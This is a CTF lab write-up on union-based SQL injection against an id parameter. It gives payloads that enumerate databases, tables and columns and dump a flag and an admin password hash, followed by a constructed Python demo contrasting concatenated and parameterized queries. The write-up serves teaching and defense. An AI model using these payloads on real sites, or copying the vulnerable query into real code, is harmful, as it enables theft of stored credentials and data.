BUU SQL COURSE 1
After entering the lab you can see three test news items. Click one and capture the request, and you find the id parameter.


Try constructing a payload for SQL injection:
### Enumerate database names
?id=-1 union select (select group_concat(schema_name) from information_schema.schemata),2#
Result: {"title":"information_schema,performance_schema,ctftraining,mysql,test,news","content":"2"}
### Enumerate table names
1. The news database
?id=-1 union select (select group_concat(table_name) from information_schema.tables where table_schema='news'),2#
Result (table names): {"title":"admin,contents","content":"2"}
2. The ctftraining database
?id=-1 union select (select group_concat(table_name) from information_schema.tables where table_schema='ctftraining'),2#
Result (table names): {"title":"FLAG_TABLE,news,users","content":"2"}
### Enumerate column names
1. The admin table in the news database
?id=-1 union select (select group_concat(column_name) from information_schema.columns where table_name='admin'),2#
Result (column names): {"title":"id,username,password","content":"2"}
2. The FLAG_TABLE table in the ctftraining database
?id=-1 union select (select group_concat(column_name) from information_schema.columns where table_name='FLAG_TABLE'),2#
Result (column names): {"title":"FLAG_COLUMN","content":"2"}
### Dump the contents
?id=-1 union select (select FLAG_COLUMN from ctftraining.FLAG_TABLE),2#
?id=-1 union select (select group_concat(username,' ',password) from admin),2#
Result (column contents): {"title":"admin 847d963fd3605f791179be6fbc4b457a","content":"2"}
In the end we obtain the username admin and the password 847d963fd3605f791179be6fbc4b457a.
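
Why the payloads above work and what stops them, as an added example that is not part of the original write-up or the lab's code. It assumes the lab concatenates id into the SQL text; it uses an in-memory SQLite database as a stand-in for the lab's MySQL (so the trailing # is dropped and `||` replaces the multi-argument group_concat), and the schema contents, function names and hash value are constructed.

```python
import sqlite3

# Constructed adaptation of the write-up's final payload for SQLite.
PAYLOAD = "-1 union select (select group_concat(username || ' ' || password) from admin),2"


def make_db():
    # Constructed stand-in for the lab's news database (tables admin, contents).
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE contents (id INTEGER PRIMARY KEY, title TEXT, content TEXT);
        CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO contents VALUES (1, 'Test news 1', 'body 1');
        INSERT INTO admin VALUES (1, 'admin', 'constructed-hash-value');
    """)
    return db


def _as_json(row):
    # Same two-field shape as the responses shown in the write-up.
    return {"title": row[0], "content": row[1]} if row else None


def get_news_vulnerable(db, raw_id):
    # Assumed lab behaviour: id is pasted into the SQL text, so the input
    # can append its own UNION SELECT and choose what lands in "title".
    sql = "SELECT title, content FROM contents WHERE id = " + raw_id
    return _as_json(db.execute(sql).fetchone())


def get_news_hardened(db, raw_id):
    # Fix 1: id must parse as an integer, anything else is rejected.
    try:
        news_id = int(raw_id)
    except ValueError:
        return None
    # Fix 2: the value is bound as a parameter and never becomes SQL syntax.
    sql = "SELECT title, content FROM contents WHERE id = ?"
    return _as_json(db.execute(sql, (news_id,)).fetchone())


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", get_news_vulnerable(db, PAYLOAD))
    print("hardened:  ", get_news_hardened(db, PAYLOAD))
    print("hardened, id=1:", get_news_hardened(db, "1"))
```

Because id = -1 matches no news row, the only row returned by the vulnerable query is the one the UNION supplies, which is why every payload in the write-up starts with -1.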